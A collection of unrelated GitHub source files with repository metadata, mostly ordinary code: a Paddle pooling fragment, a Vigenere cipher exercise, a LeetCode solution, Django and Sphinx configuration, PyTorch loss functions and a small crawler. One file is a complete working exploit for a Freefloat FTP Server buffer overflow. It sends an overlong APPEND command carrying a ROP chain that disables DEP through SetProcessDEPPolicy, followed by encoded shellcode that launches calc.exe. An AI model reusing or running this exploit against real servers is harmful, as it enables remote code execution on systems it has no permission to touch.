dtype = helper.input_dtype(input_param_name='x')
pool_out = helper.create_variable_for_type_inference(dtype)
mask = helper.create_variable_for_type_inference('int32')
outputs = {"Out": pool_out, "Mask": mask}
helper.append_op(type=l_type,
inputs={"X": x},
outputs=outputs,
attrs={
"pooling_type": 'max',
"ksize": output_size,
"adaptive": True,
})
return (pool_out, mask) if return_mask else pool_out
|
[
"noreply@github.com"
] |
jiangjiajun.noreply@github.com
|
bf5915516e79b38b93c7a269ba95623d23fd8446
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/StudentProblem/10.21.11.40/4/1569574682.py
|
2a8bdc9fdab5515c21c04740702065a86d270197
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import functools
import typing
import string
import random
import pytest
## Lösung Teile 1. und 2.
class Vigenere:
def __init__(self, key: str):
"""
Create object with a secret key.
"""
assert key
self.key = key
def encrypt(self, w: str) -> str:
"""
Encrypt the given text with the secret key of the object.
"""
new_key = self.key * (len(w) // len(self.key) + 1)
msg = ""
for i, c in enumerate(w):
new_c = chr(ord(c) + (ord(new_key[i]) - ord('A')))
if ord(new_c) > ord('Z'):
new_c = chr(ord(new_c) - 26)
msg += new_c
return msg
def decrypt(self, w: str) -> str:
"""
Decrypts the given text with the secret key of the object.
"""
new_key = self.key * (len(w) // len(self.key) + 1)
msg = ""
for i, c in enumerate(w):
new_c = chr(ord(c) - (ord(new_key[i]) - ord('A')))
if ord(new_c) < ord('A'):
new_c = chr(ord(new_c) + 26)
msg += new_c
return msg
######################################################################
## Lösung Teil 3. (Tests)
def test_vigenere():
v1 = Vigenere("MYSECRETKEY")
assert v1.decrypt(v1.encrypt("TESTFOOBAR")) == "TESTFOOBAR"
v2 = Vigenere("AAA")
assert v2.encrypt("BBB") == "BBB"
assert Vigenere("ABCD").encrypt("DCBA") == "DEFG"
######################################################################
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
4015633612642f4401bc86f7774e1ad5288cfac1
|
a599b24b934e75336913e448e05042757316c47b
|
/1019.NextGreaterNodeInLinkedList.py
|
d8a48d3aedf89f07b7699f6b5ae3292306582712
|
[] |
no_license
|
yilunchen27/leetcode-google-python
|
2e8f479c3ed63d77e6fb32d146adf51a294ceebc
|
e665b2a9db381bcd97e5fbaaaa566f11c3a8be32
|
refs/heads/master
| 2022-02-14T17:00:02.131783
| 2019-09-02T08:49:05
| 2019-09-02T08:49:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,368
|
py
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
@staticmethod
def get_length(head: ListNode) -> int:
node = head
cnt = 0
while node is not None:
node = node.next
cnt += 1
return cnt
def nextLargerNodes(self, head: ListNode) -> List[int]:
n = Solution.get_length(head)
stack = list()
res = [0] * n
node = head
index = 0
for i in range(n):
while stack and node.val > stack[-1][1]:
res[stack.pop()[0]] = node.val
stack.append((index, node.val))
index += 1
node = node.next
return res
# Solution 2: No need of find length first.
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
# class Solution:
# def nextLargerNodes(self, head: ListNode) -> List[int]:
# stack = list()
# res = list()
# node = head
# while node:
# while stack and node.val > stack[-1][1]:
# res[stack.pop()[0]] = node.val
# stack.append((len(res), node.val))
# res.append(0)
# node = node.next
# return res
|
[
"huangruihaocst@126.com"
] |
huangruihaocst@126.com
|
734d5b3d90fd5a1bd6b690cd8ecd5522c9518feb
|
4a3e6789ebbe88c95c76b15f2b1ddc77d68a8545
|
/admin.py
|
589b8a479b367527c49fd9c59e2c6de0d73470bc
|
[] |
no_license
|
macrman/tickets
|
d48f916aa1e8f3e78a04dc8eb925ebf2bd7ffaed
|
d53be7788a9862e574b40b9c0768eea3aa229244
|
refs/heads/master
| 2016-09-02T01:02:00.200478
| 2012-05-10T21:35:11
| 2012-05-10T21:35:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
from tickets.models import ticket
from django.contrib import admin
admin.site.register(ticket)
|
[
"binarymac@gmail.com"
] |
binarymac@gmail.com
|
a87256f1ecd75f07e0e2d5006696dde6af08488c
|
8c0f9efbc962d04a453422119a896e31fcdc009e
|
/07.string/ljustTest.py
|
d31d369d1f185f0d979d7d6901c34fee85817423
|
[] |
no_license
|
unclebae/Python3-tutorial
|
4adf927c5a9373c83689ba9cf9a307d06d950a62
|
4bfe31013533b50804110aa90e3e25635b3b7cf9
|
refs/heads/master
| 2021-01-18T18:33:16.757433
| 2016-07-23T18:09:57
| 2016-07-23T18:09:57
| 64,009,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 69
|
py
|
str = "this is string example....wow!!!"
print (str.ljust(50, '*'))
|
[
"kido@coupang.com"
] |
kido@coupang.com
|
6bfc80d810a67dbe8a8a6216a966d341b0e2ac28
|
ccd8aec1c3b00a62946f55a3c4b6458fca295528
|
/starterbot/bin/pip3
|
f58ce69b13ee993556221ca1ad77fcaba3247e74
|
[] |
no_license
|
tpriyanshu90/motiBot
|
e53cffc01e0316e42561b64de81ce268490e49d0
|
37d2fca2fc91fde15630b93de089ae9e0485e1d4
|
refs/heads/master
| 2020-04-04T10:12:49.240135
| 2018-11-05T16:34:03
| 2018-11-05T16:34:03
| 155,846,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
#!/home/tpriyanshu/Desktop/pythonBot/motiBot/starterbot/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"tpriyanshu90@gmail.com"
] |
tpriyanshu90@gmail.com
|
|
1fbf6a0ceed592bce3279768df724fa06ec3a90a
|
e00df1e9b3b501a548518034c8adf5a32aab4607
|
/quiz/models.py
|
1a8aa559bda3b9c5aa74c0083fdbbc5132675d2e
|
[] |
no_license
|
imajaydwivedi/SQLDBAToolsInventory
|
f83e6f3e3d0c6a02c85ede22251b6efec64084f9
|
3df150732d283b082cc81888631003cd8917dea9
|
refs/heads/master
| 2020-04-10T04:03:28.261925
| 2019-01-07T07:26:40
| 2019-01-07T07:26:40
| 160,786,851
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,148
|
py
|
from django.db import models
# Create your models here.
class Questiontechnology(models.Model):
technologyid = models.AutoField(primary_key=True)
CATEGORY_CHOICES = (
('MSSQL', 'SQL Server'),
('MySQL', 'MySQL'),
('Oracle', 'Oracle'),
)
category = models.CharField(
max_length=20, blank=True, null=True, choices=CATEGORY_CHOICES, default='MSSQL')
SUBCATEGORY_CHOICES = (
('DEV', 'Development'),
('Admin', 'Administration'),
('Art', 'Architect'),
)
subcategory = models.CharField(max_length=20, blank=True, null=True, choices = SUBCATEGORY_CHOICES, default = 'Admin')
LEVEL_CHOICES = (
('L1','Level 01 - Beginner'),
('L2','Level 02 - Intermediate'),
('L3','Level 03 - Expert'),
('L4','Level 04 - SME'),
)
# level = models.IntegerField(blank=True, null=True)
level = models.CharField(max_length=8, blank=True, null=True, choices = LEVEL_CHOICES, default = 'L2')
description = models.CharField(max_length=255, blank=True, null=True)
class Meta:
managed = False
db_table = 'QuestionTechnology'
|
[
"ajay.dwivedi2007@gmail.com"
] |
ajay.dwivedi2007@gmail.com
|
f3f49a15573cd234eda38635a963deb65a4e5fa6
|
f57b8ea2a5b955a587488069b6b0f8bd180ff32d
|
/docs/source/conf.py
|
3650576aefbf7fcb81bdbfde0cc13d15760efab4
|
[
"NCSA",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
UIUCLibrary/HT_checksum_update
|
002416e9b435c8e4c242e2f2a425dca773553137
|
facee4de7f982746913f2b1b68a91395b5107e1a
|
refs/heads/master
| 2021-07-13T23:44:04.466191
| 2021-03-30T18:39:44
| 2021-03-30T18:39:44
| 97,273,018
| 0
| 0
|
NOASSERTION
| 2021-03-30T18:34:58
| 2017-07-14T21:11:15
|
Python
|
UTF-8
|
Python
| false
| false
| 6,048
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# hathiChecksumUpdate documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 17 14:52:11 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
import hathi_checksum
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.githubpages',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = hathi_checksum.FULL_TITLE
copyright = '2017, {}'.format(hathi_checksum.__author__)
author = hathi_checksum.__author__
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = hathi_checksum.__version__
# The full version, including alpha/beta/rc tags.
release = hathi_checksum.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# 'logo': 'full_mark_horz_bw.png',
'github_user': 'uiuclibrary',
'github_repo': 'HT_checksum_update',
'github_button': True,
'logo_name': True,
'description': hathi_checksum.__description__
}
# html_use_smartypants = True
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'hathiChecksumUpdatedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'hathiChecksumUpdate.tex', 'hathiChecksumUpdate Documentation',
'h', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'hathichecksumupdate', 'hathiChecksumUpdate Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'hathiChecksumUpdate', 'hathiChecksumUpdate Documentation',
author, 'hathiChecksumUpdate', 'One line description of project.',
'Miscellaneous'),
]
|
[
"hborcher@illinois.edu"
] |
hborcher@illinois.edu
|
e244ccda4d34da7aec1bbbfa2d7f4040f2834f76
|
fd44e1d649cdd97dddfce18004bbe68042d13700
|
/resources/lib/basictypes/wx/font.py
|
f7ec03aa1e272cb0fd46792b48853f0b95a82a37
|
[
"MIT"
] |
permissive
|
Flaykz/Transmission-KODI
|
97e0652dff95eca15c6479a24d56cb52aae73a52
|
3b32d7a8d2685be9b958f4544c3b42b2baf4c705
|
refs/heads/master
| 2020-12-03T09:12:40.944762
| 2019-05-24T05:36:08
| 2019-05-24T05:36:08
| 49,025,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
"""Data-type definition for wxPython font class"""
from wxPython.wx import *
from basictypes import datatypedefinition, registry
##from basictypes.wx import wxcopyreg
__all__ = ( "wxFont_DT", )
class wxFont_DT( datatypedefinition.BaseType_DT ):
"""Data-type definition for wxPython font class"""
dataType = "wx.font"
baseType = wxFontPtr
registry.registerDT( wxFontPtr, wxFont_DT)
registry.registerDT( wxFont, wxFont_DT)
|
[
"david.brouste.perso@gmail.com"
] |
david.brouste.perso@gmail.com
|
81cacfcc4c95a515be546b246ef49adaab293c91
|
94c8f0b09ced7ae86fba0d09faf4310e508c18e5
|
/scaler/dp2/dp1/ath_fibonacci_number.py
|
d681bacdc08f7d1b0bd4b977577937b4c9e089ee
|
[] |
no_license
|
navkant/ds_algo_practice
|
6e7dd427df6ac403ac23fa68b079b162b839447a
|
a2b762d08b151f6dbbc12d76dd930f6cd7b9017d
|
refs/heads/master
| 2023-06-24T02:56:25.886991
| 2021-06-13T03:42:24
| 2021-06-13T03:42:24
| 376,431,047
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 936
|
py
|
class Solution:
def __init__(self):
self.ath_term = 0
def ath_fibonacci_recursive(self, first, second, A, postion):
if A <= 1:
self.ath_term = A
return
if postion == A:
self.ath_term = second
return
self.ath_fibonacci_recursive(second, second+first, A, postion+1)
def ath_fibonaccu_iterative(self, A):
if A <= 1:
return A
first = 0
second = 1
for i in range(2, A+1):
temp = first
first = second
second = temp + second
return second
def solve(self, A):
f = 0
s = 1
self.ath_fibonacci_recursive(f, s, A, 1)
print(f'recursive ans is {self.ath_term}')
ans = self.ath_fibonaccu_iterative(A)
print(f'iterative ans is {ans}')
if __name__ == '__main__':
a = 6
obj = Solution()
obj.solve(a)
|
[
"navkanttyagi@MacBook-Air.local"
] |
navkanttyagi@MacBook-Air.local
|
8258ae3f393ff2d10aff6c0cca258bf813913879
|
36931f23be2afadaee6a047bb3e86309f64b5e99
|
/Losses/losses.py
|
0339a164303ef648d1d72b45537bd41bc35628ed
|
[] |
no_license
|
cvlab-stonybrook/S2N_Release
|
13cf4df6b2c8ef65bdbf6163266eb5c55080ebe9
|
bc32142d059add14d550c8980adf3672485d4a98
|
refs/heads/master
| 2022-06-26T23:46:40.490222
| 2018-12-25T13:41:02
| 2018-12-25T13:41:02
| 235,153,446
| 0
| 0
| null | 2022-06-22T00:52:01
| 2020-01-20T17:06:09
|
Python
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
import torch
import torch.nn.functional as F
from torch.autograd import Variable
def EMD_L2(predictions, targets, needSoftMax=True):
#TODO: checked run but not checked correctness!
if needSoftMax:
predictions = F.softmax(predictions, dim=1)
predictions = torch.cumsum(predictions, dim=1)
targets = torch.cumsum(targets, dim=1)
lossvalue = torch.norm(predictions - targets, p=2).mean()
return lossvalue
# elm_loss = (predictions - targets)**2
# batch_size = predictions.size(0)
# return torch.sum(elm_loss)/batch_size
def Simple_L2(predictions, targets, needSoftMax=True):
#TODO: checked run but not checked correctness!
if needSoftMax:
predictions = F.softmax(predictions, dim=1)
# predictions = torch.cumsum(predictions, dim=1)
# targets = torch.cumsum(targets, dim=1)
lossvalue = torch.norm(predictions - targets, p=2).mean()
return lossvalue
def to_one_hot(y, n_dims=None, useCuda=True):
""" Take integer y (tensor or variable) with n dims and convert it to 1-hot representation with n+1 dims. """
y_tensor = y.data if isinstance(y, Variable) else y
y_tensor = y_tensor.type(torch.LongTensor).view(-1, 1)
n_dims = n_dims if n_dims is not None else int(torch.max(y_tensor)) + 1
y_one_hot = torch.zeros(y_tensor.size()[0], n_dims).scatter_(1, y_tensor, 1)
if useCuda:
y_one_hot=y_one_hot.cuda()
y_shape = [i for i in y.shape]
y_shape.append(-1)
y_one_hot = y_one_hot.view(*y_shape)
return Variable(y_one_hot, requires_grad=False) if isinstance(y, Variable) else y_one_hot
def WeightedMSE(predictions, targets, weights):
#TODO: check if there are error heres
return torch.dot(weights.view_as(predictions), (predictions - targets) ** 2)
def MSEloss(predictions, targets):
return torch.sum((predictions - targets.view_as(targets))**2)
def ClsLocLoss(predictions, targets, overlaps):
# adapted from Shou CVPR2016
# caffe version defined in
# https://github.com/zhengshou/scnn/blob/master/C3D-v1.0/C3D_overlap_loss/src/caffe/layers/softmax_loss_layer.cpp
# loss_overlap += 0.5 * (prob_data[i * dim + static_cast < int > (label[i])] / static_cast < float > (std
# ::sqrt(std::sqrt(std::sqrt(overlap[i])))))*(
# prob_data[i * dim + static_cast < int > (label[i])] / static_cast < float > (std
# ::sqrt(std::sqrt(std::sqrt(overlap[i]))))) - 0.5;
target_weights = (targets!=0).float()
loss = (predictions**2/ overlaps.pow(0.25) - targets**2)
loss = torch.sum(loss * target_weights)
return loss
def ClsLocLoss2_OneClsRegression(predictions, targets, overlaps):
# following the previous loss, but modified for our use case
# overlap with ground truth is 0, we set overlap to 1 to avoid divison with 0, but weight them 0
# target_weights = (overlaps!=0).float()
loss = (predictions / overlaps - targets.float())**2
loss = torch.sum(loss)
return loss
def ClsLocLoss2_OneClsRegression_v2(predictions, overlaps):
# following the previous loss, but modified for our use case
# overlap with ground truth is 0, we set overlap to 1 to avoid divison with 0, but weight them 0
# target_weights = (overlaps!=0).float()
loss = (predictions - overlaps)**2
loss = torch.sum(loss)
return loss
def ClsLocLoss_MultiClass(predictions, targets, overlaps, useSoftMax=True):
if useSoftMax:
predictions = F.softmax(predictions, dim=1)
overlaps = overlaps.view_as(targets)
target_weights = (overlaps!=0).float()
overlaps[overlaps==0]=1
loss = (predictions.gather(dim=1, index=targets.long())/(overlaps.pow(0.125)) - 1)**2
loss = torch.sum(loss * target_weights)
return loss
def ClsLocLoss_Regression(predictions, targets, overlaps, thres=0.7, useSoftMax=True):
overlaps = overlaps.view_as(targets)
targets[overlaps<thres]=0
target_weights = (overlaps!=0).float()
overlaps[overlaps==0]=1
loss = (predictions/(overlaps.pow(0.125)) - targets)**2
loss = torch.sum(loss * target_weights)
return loss
if __name__ == '__main__':
import numpy as np
from torch.autograd import Variable
predictions = torch.rand(2,5)
targets = torch.zeros(*predictions.size())
targets[0,1] = 1
targets[1,2] = 1
predictions = Variable(predictions, requires_grad=True)
targets = Variable(targets, requires_grad=False)
loss = EMD_L2(predictions, targets, needSoftMax=True)
loss.backward()
print "DB"
|
[
"zijwei@cs.stonybrook.edu"
] |
zijwei@cs.stonybrook.edu
|
cfcede48184a481953cd48b7e63e96ad844a9104
|
29dfcadf661148c35bc3a8d292e2a61d5c8a74d0
|
/application/views/runs.py
|
dd7dfed3af86c360ee639ac81e1483ef2b54e2d8
|
[
"MIT"
] |
permissive
|
AstroChem/MAPServer
|
4fa416e4f0c66e9d1d1471282eec2415cf69b272
|
3ea8209d5d106c8799216ae2405ba1c396477eec
|
refs/heads/master
| 2022-08-09T01:11:38.323804
| 2020-05-16T20:43:55
| 2020-05-16T20:43:55
| 249,030,766
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,882
|
py
|
from flask import (
render_template,
session,
redirect,
url_for,
current_app,
g,
send_from_directory,
)
import os
import pandas as pd
import numpy as np
from bokeh.plotting import figure
from bokeh.models import ColumnDataSource
from bokeh.embed import components
from bokeh.palettes import Dark2_5 as palette
import itertools
from sqlalchemy import select, join, and_, func, literal, desc, asc
from mapsdb import schema
from flask import Blueprint
from application.db import get_db
from application.views.auth import login_required
bp = Blueprint("runs", __name__)
@bp.route("/runs/")
def runs():
"""
Show all runs
"""
db = get_db()
with db.begin():
# create a giant join to get all the important run properties
j = (
schema.runs.join(schema.run_statuses)
.join(schema.measurement_sets)
.join(schema.disks)
.join(schema.transitions)
.join(schema.method_implementations)
.join(schema.method_types)
)
s = (
select(
[
schema.runs,
schema.run_statuses.c.run_status,
schema.method_implementations,
schema.method_types.c.method_type,
schema.disks.c.disk_name,
schema.transitions.c.transition_id,
schema.transitions.c.molecule_name,
schema.transitions.c.quantum_number,
]
)
.reduce_columns()
.select_from(j)
)
result = db.execute(s)
runs_list = result.fetchall()
return render_template("runs/runs.html", runs_list=runs_list)
@bp.route("/runs/<int:run_id>/")
def run(run_id):
"""
Show the run summary corresponding to the run_id.
"""
# get the loss.csv fname from the run_id
db = get_db()
with db.begin():
s = select([schema.runs.c.output_dir]).where(schema.runs.c.run_id == run_id)
result = db.execute(s)
rel_output_dir = result.first()[0]
# load the file and use bokeh to make a figure of loss rates
fname = os.path.join(current_app.config["MAPS_ROOT"], rel_output_dir, "losses.csv")
if os.path.exists(fname):
df = pd.read_csv(fname)
# drop the columns that are nan
df = df.dropna(axis=1)
source = ColumnDataSource(df)
colors = itertools.cycle(palette)
p = figure(title="Losses", x_axis_label="Iteration", y_axis_label="Loss")
for key in [
"tot",
"nll",
"entropy",
"sparsity",
"TV_image",
"TV_channel",
"UV_sparsity",
]:
if key in df.columns:
p.line(
x="index",
y=key,
source=source,
line_width=2,
legend_label=key,
color=next(colors),
)
bokeh_script, bokeh_plot_div = components(p)
else:
bokeh_script = None
bokeh_plot_div = None
# get the disk_parameters
db = get_db()
with db.begin():
s = select([schema.cube_types])
result = db.execute(s)
cube_types = result.fetchall()
# create a join with runs, disk_id, etc.
j = (
schema.runs.join(schema.measurement_sets)
.join(schema.disks)
.join(schema.transitions)
)
s = (
select(
[schema.runs, schema.disks, schema.measurement_sets, schema.transitions]
)
.where(schema.runs.c.run_id == run_id)
.select_from(j)
).reduce_columns()
result = db.execute(s)
combo_params = result.first()
j = schema.runs.join(schema.parameters)
s = (
select([schema.parameters])
.select_from(j)
.where(schema.runs.c.run_id == run_id)
)
run_parameters = db.execute(s).first()
# assemble run statistics
s = select(
[
schema.runs.c.bkgd_mean,
schema.runs.c.bkgd_rms,
schema.runs.c.peak_flux,
schema.runs.c.tot_flux,
]
).where(schema.runs.c.run_id == run_id)
run_stats = db.execute(s).first()
# get all cubes produced for this run
j = schema.cubes.join(schema.runs).join(schema.cube_types)
s = (
select([schema.cubes.c.cube_id, schema.cube_types.c.cube_type])
.select_from(j)
.where(schema.runs.c.run_id == run_id)
).reduce_columns()
result = db.execute(s)
cubes_list = result.fetchall()
# go through and produce a nested list of cube, cube_images
# for each cube, get all the images and image paths
j = (
schema.cubes.join(schema.runs)
.join(schema.cube_types)
.join(schema.cube_images)
)
s = (
select([schema.cube_images])
.select_from(j)
.where(
and_(
(schema.cubes.c.cube_type_id == 0), (schema.runs.c.run_id == run_id)
)
)
.order_by(desc(schema.cube_images.c.frequency))
)
result = db.execute(s)
cube_images = result.fetchall()
image_paths = ["/" + cube_image["image_path"] for cube_image in cube_images]
return render_template(
"runs/run_id.html",
cube_types=cube_types,
combo_params=combo_params,
run_parameters=run_parameters,
run_stats=run_stats,
run_id=run_id,
image_paths=image_paths,
bokeh_script=bokeh_script,
bokeh_plot_div=bokeh_plot_div,
)
|
[
"iancze@gmail.com"
] |
iancze@gmail.com
|
e73ce0141e056aeb4865b7b2853949b6a3bd271b
|
0a919ab783d2fa8a052e6fb53ea797b10e3cb12d
|
/Bangalore/19th Jan 2013/FreeFloat_SetProcessDEPPloicy.py
|
5b16cb230799989035a0917c42a2088f3bdc5194
|
[] |
no_license
|
SirEOF/null
|
7e3969ffd605e1c7be88faff5ea9ad9819e7b1fe
|
e19e778b6aad8a156d9fe0fc92f9f9e44838c6d2
|
refs/heads/master
| 2021-05-27T12:33:55.648871
| 2014-08-12T08:00:25
| 2014-08-12T08:00:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,119
|
py
|
#!/usr/bin/python
import socket, sys, os, time
from struct import pack
print "\n+---------------------------------------+"
print "+ Freefloat FTP Server Buffer Overflow +"
print "+ HackSys Team - Panthera +"
print "+ Ashfaq Ansari +"
print "+ hacksysteam@hotmail.com +"
print "+ http://hacksys.vfreaks.com/ +"
print "+---------------------------------------+\n"
#Target IP address
target = "192.168.96.131"
#Target Port
port = 21
#Send 244 bytes of junk bytes
junk = "A" * 244
eip = pack('<L',0x7C90120F) #RETN
junk2 = "C" * 8
######################ROP using SetProcessDEPPolicy######################
rop = pack('<L',0x7cb856bf) #0x7cb856bf : # POP EBX # POP EBP # RETN 0C
rop += "\xff"*8
rop += pack('<L',0x7cada541) # : # INC EBX # ADD AL,3 # RETN )
rop += "D"*12
rop += pack('<L',0x7cbb4643) #0x7cbb4643 : # XOR EAX,EAX # POP EDI # POP ESI # POP EBP # RETN 08
rop += pack('<L',0x7C90120F) #RETN
rop += pack('<L',0x7C90120F) #RETN
rop += pack('<L',0x7c862144) #<- SetProcessDEPPolicy, into EBP
rop += pack('<L',0x7ca44fbd) #: # PUSHAD # RETN
##############################End ROP ####################################
#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b "\x00\x0a\x0d" -t c > calc.shellcode
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
#Size: 228 bytes
#Bad chars: \x00\x0a\x0d
esp_shellcode = ("\xd9\xc7\x2b\xc9\xd9\x74\x24\xf4\xb8\xef\x46\x88\xf0\x5d\xb1"
"\x33\x83\xc5\x04\x31\x45\x14\x03\x45\xfb\xa4\x7d\x0c\xeb\xa0"
"\x7e\xed\xeb\xd2\xf7\x08\xda\xc0\x6c\x58\x4e\xd5\xe7\x0c\x62"
"\x9e\xaa\xa4\xf1\xd2\x62\xca\xb2\x59\x55\xe5\x43\x6c\x59\xa9"
"\x87\xee\x25\xb0\xdb\xd0\x14\x7b\x2e\x10\x50\x66\xc0\x40\x09"
"\xec\x72\x75\x3e\xb0\x4e\x74\x90\xbe\xee\x0e\x95\x01\x9a\xa4"
"\x94\x51\x32\xb2\xdf\x49\x39\x9c\xff\x68\xee\xfe\x3c\x22\x9b"
"\x35\xb6\xb5\x4d\x04\x37\x84\xb1\xcb\x06\x28\x3c\x15\x4e\x8f"
"\xde\x60\xa4\xf3\x63\x73\x7f\x89\xbf\xf6\x62\x29\x34\xa0\x46"
"\xcb\x99\x37\x0c\xc7\x56\x33\x4a\xc4\x69\x90\xe0\xf0\xe2\x17"
"\x27\x71\xb0\x33\xe3\xd9\x63\x5d\xb2\x87\xc2\x62\xa4\x60\xbb"
"\xc6\xae\x83\xa8\x71\xed\xc9\x2f\xf3\x8b\xb7\x2f\x0b\x94\x97"
"\x47\x3a\x1f\x78\x10\xc3\xca\x3c\xee\x89\x57\x14\x66\x54\x02"
"\x24\xeb\x67\xf8\x6b\x15\xe4\x09\x14\xe2\xf4\x7b\x11\xaf\xb2"
"\x90\x6b\xa0\x56\x97\xd8\xc1\x72\xf4\xbf\x51\x1e\xd5\x5a\xd1"
"\x85\x29\xaf")
#Another Junk - NOP - No Operation Code
nops = "\x90" * 300
#Create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
#Connect to target port
s.connect((target,port))
#Receive 1024 bytes
s.recv(1024)
print "[+] Triggering Vulnerability - Sending junk data"
#Send vulnerable command
s.send("APPEND " + junk + eip + junk2 + rop + nops + esp_shellcode + "\r\n")
#Close the socket
s.close()
print "[+] Exploit Sent Successfully. Check for calc.exe"
except:
print "[-] Could not connect to %s on port %d" % (target,port)
#Exit the exploit
sys.exit(0)
|
[
"ashfaq_ansari1989@hotmail.com"
] |
ashfaq_ansari1989@hotmail.com
|
3950de9397b0d3f4b694e184e983d755ad198aa7
|
692c98fe9cda839b8c965e89de15b22747e36494
|
/homework/crawler .py
|
ae808fbc25bc3ae94ff499dd7e9efc1505a9ac93
|
[] |
no_license
|
linafeng/Py3
|
a609b6a12ffc461257d0292cb8f1178bd2746280
|
fa9d9f2c65a22080bc9725c22ab57211a816efc3
|
refs/heads/master
| 2020-06-24T15:01:37.812013
| 2020-05-11T08:06:05
| 2020-05-11T08:06:05
| 198,994,427
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,880
|
py
|
# -*- coding:utf-8 -*-
# https://www.zdic.net/zd/zb/cc1/
# pip3 install requests
# http请求的库
import requests
# 正则匹配的库
import re
# 抓取到网页的源代码 post
html_result = requests.get("https://www.zdic.net/zd/zb/cc1/")
print(html_result.text)
# 书写正则表达式来获取网页源代码的所有汉字
reg = "href='/hans/(.*)' "
